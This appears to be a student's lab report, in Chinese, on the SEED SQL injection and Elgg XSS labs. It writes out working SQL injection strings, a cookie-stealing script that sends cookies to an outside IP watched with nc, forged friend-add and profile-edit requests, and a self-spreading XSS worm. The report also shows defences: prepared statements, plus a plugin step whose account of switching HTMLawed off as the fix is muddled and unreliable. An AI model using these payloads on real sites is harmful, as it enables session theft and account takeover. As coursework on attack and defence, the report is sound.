20212903 2021-2022-2 《网络攻防实践》实践10报告

20212903 2021-2022-2 《网络攻防实践》实践10报告

1.实践内容

一、SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

  • 熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
  • 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
  • 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
  • SQL对抗:修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

  • 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
  • 弹窗显示cookie信息:将cookie信息显示。
  • 窃取受害者的cookies:将cookie发送给攻击者。
  • 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
  • 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
  • 编写XSS蠕虫。
  • 对抗XSS攻击。

2.实践过程

一、SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

1、首先我们需要利用指令sudo service apache2 start开启apache服务

通过下图我们可以看到服务器处于正在运行的状态

image-20220519173620767

2、使用命令mysql -u root -p登录mysql数据库

image-20220519173853771

3、利用指令show databases;查看mysql中已有的数据库

image-20220519173955867

4、利用指令use Users;show tables;进行切换数据库,并在查看Users数据库中的所有表

image-20220519174135241

5、利用sql语句select * from credential;查看credential中所有记录

image-20220519174338103

7、使用sql语句select * from credential where Name = 'Ted';查询Name为Ted的相关记录

image-20220519174513479

对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

1、使用浏览器进入www.SEEDLabSQLInjection.com网站

image-20220519174827234

2、右键查看网页源码,发现登陆的表单中使用get方法访问unsafe_home.php

image-20220519175115749

3、相关的文件可以利用浏览器进行查看,其相关地址为:/var/www/SQLInjection/unsafe_home.php

通过下面两个图我们可以看到,该程序针对admin和普通用户具有不同的处理方法。

image-20220519175724248

image-20220519175907943

4、因此针对程序代码,我们可以构造Admin'#,并让$input_uname等于该值,这样会使得#后的Password判断不会执行(在sql语句中,#表示注释)。通过这样的方法我们便可以在不知道密码的情况下以admin用户进行登录,如下图,密码随机输入

image-20220519180441318

可以看到我们已经成功登录!

image-20220519180549206

对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

1、首先查看Edit_Profile页面的源代码

从下图我们看到,表单依旧是以Get方式将数据发到unsafe_edit_backend.php页面

image-20220519180824234

2、跟上一个类似,依旧是用浏览器查看unsafe_edit_backend.php页面其地址为/var/www/SQLInjection/unsafe_edit_backend.php

根据下图我们可以看到UPDATE更新语句处,我们可以通过构造$input_nickname的值来进行SQL注入攻击。我们可以使$input_nickname的值等于', Salary='2903' where name='Admin'; #,也就是把Admin的Salary改为2903

image-20220519181144827

3、在NickName处输入', Salary='2903' where name='Admin'; #

image-20220519181711556

再次查看,可以看到admin的Salary已经改为2903

image-20220519181818262

SQL对抗:修复上述SQL注入攻击漏洞。

本实验中修改sql语句的方法,是将参数与需要执行的动作或条件分开,从而避免的了sql注入的风险。

1、首先针对unsafe_home.php中的SELECT语句进行修改

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

2、针对unsafe_edit_backend.php的UPDATE语句进行修改

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

1、首先在浏览器中访问http://www.seedlabsqlinjection.com/unsafe_home.php网页

image-20220520091240589

2、使用 账号:Alice,密码:seedalice 进行登录

image-20220520091507185

image-20220520091654689

3、首先点击Alice头像进入主页,再选择Edit profile,最后在Brief description中输入XSS攻击代码<script> alert('xss');</script>

image-20220520091850495

点击保存,发现弹出xss警告弹窗

image-20220520091947776

弹窗显示cookie信息:将cookie信息显示。

1、依旧是在Edit profile里面的brief description中输入xss攻击代码

<script> alert(document.cookie);</script>

image-20220520092214884

点击保存后,会显示出cookie的信息

image-20220520092319064

窃取受害者的cookies:将cookie发送给攻击者。

1、因为需要把cookie发送给攻击者,因此首先查看seed虚拟机的IP地址,从下图可以看出,IP地址为:172.30.5.228

image-20220520092500951

2、根据seed的IP地址构造xss攻击代码(本机的2903端口是没有被占用的端口),依旧是在Edit profile里面的brief description中输入xss攻击代码并点击板保存。

<script>document.write('<img src=http://172.30.5.228:2903?c='+escape(document.cookie) + ' >');</script>

image-20220520094409311

3、切换账号,使用boby的账号进行登录

账号:Boby
密码:seedboby

image-20220520093045412

image-20220520093104801

4、使用指令nc -l 2903 -v监听2906端口

image-20220520094329065

5、和Alice成为好友

image-20220520095154546

使用Boby的账号访问alice

image-20220520093345952

成功得到boby的cookie!

image-20220520094238578

成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

1、打开火狐浏览器的Web Console,查看network,然后点击和Charlie成为好用,这时我们可以在network中看到网站以POST的方式向http://www.xsslabelgg.com/action/friends/add提交了参数表单

image-20220520095721998

从下图我们可以看到一共申请参数一共有三个,分别是:friend,__elgg_ts,__elgg_token

别分代表着好友的id、时间戳以及token

image-20220520095522173

2、根据以上信息我们可以构造xss攻击代码

<script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;


    //Construct the HTTP request to add Samy as a friend.
    var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

    //Create and send Ajax request to add friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    Ajax.send();
}
</script>

将该段代码放到Alice的About me下并选择Edit HTML模式,点击保存

image-20220520100315604

3、使用boby登录,为进行测试攻击代码是否生效,先把Alice移除好友

image-20220520100416186

点击访问Alice主页,我们可直接在Web Console的Network中看到自动申请添加好友的数据包

image-20220520100639337

image-20220520100620274

我们发现Boby已经和Alice成为朋友了

image-20220520100813603

修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

1、首先尝试更改About me的内容,并在Web Console的Network中查看到网站用POST的方式提交表单给http://www.xsslabelgg.com/action/profile/edit链接。

image-20220520101505380

并且可以可看到提交数据包的参数中包括__elgg_token__elgg_tsnamedescription等信息

image-20220520101758933

2、根据以上信息可以进行构造xss攻击代码

<script type="text/javascript">
	window.onload = function(){
		//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
		//and Security Token __elgg_token
		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.20212903wj </p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)
		//FILL IN
		var samyGuid=44;
		//FILL IN
		if(elgg.session.user.guid!=samyGuid)
		{
			//Create and send Ajax request to modify profile
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	}
</script>

将构造的xss攻击代码依旧是放在Alice的About me中,并点击保存

image-20220520102535253

2、登录Boby的账号,并浏览Alice的主页

image-20220520102847161

再回到Boby的主页发现About me这里已经被改变了

image-20220520102927869

编写XSS蠕虫。

1、我们根据前面的xss攻击代码构造一个具有传染性的xss蠕虫,代码如下:

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack.20212903wj"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)

		var samyGuid=44;

		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
		
	}
</script>

还是将这段xss蠕虫代码房子啊Alice的About me中,并点击保存:

image-20220520103258294

2、登录Boby账号,访问Alice主页

image-20220520103509889

查看Boby的About me发现也已经被改变了,感染了xss蠕虫攻击代码

image-20220520103616315

对抗XSS攻击。

1、首先登录admin的账号

image-20220520103841792

2、然后点击Administrator中的plugins

image-20220520104350552

image-20220520104435098

3、找到插件HTMLawed,将其关闭,设为Deactivate状态,该插件主要是用来校验用户的输入输出,并且可以自动删除特定的标签

image-20220520104634694

4、再次登录Boby账号,发现XSS蠕虫攻击已经失效

image-20220520104815619

3.学习中遇到的问题及解决

  • 问题1:在第一次尝试将cookie发送给攻击者时并没有发送成功

    而且监听端口也没有监听到

image-20220520093702104

  • 问题1解决方案:后来检查发现是xss攻击代码中172.30.5.228写成了170.30.5.228

image-20220520093746396

4.实践总结

通过这次实验,我自己动手实现了sql注入以及xss攻击。之前在本科阶段,我在学习MyBatis时,曾讲到过可以防止sql注入,但那时的我并不清楚sql注入有何危险,或是怎么实现的。这次实践我真实到了解sql注入的危险以及会造成什么样的后果。

参考资料

posted @ 2022-05-22 08:46  William_tony老师  阅读(37)  评论(0编辑  收藏  举报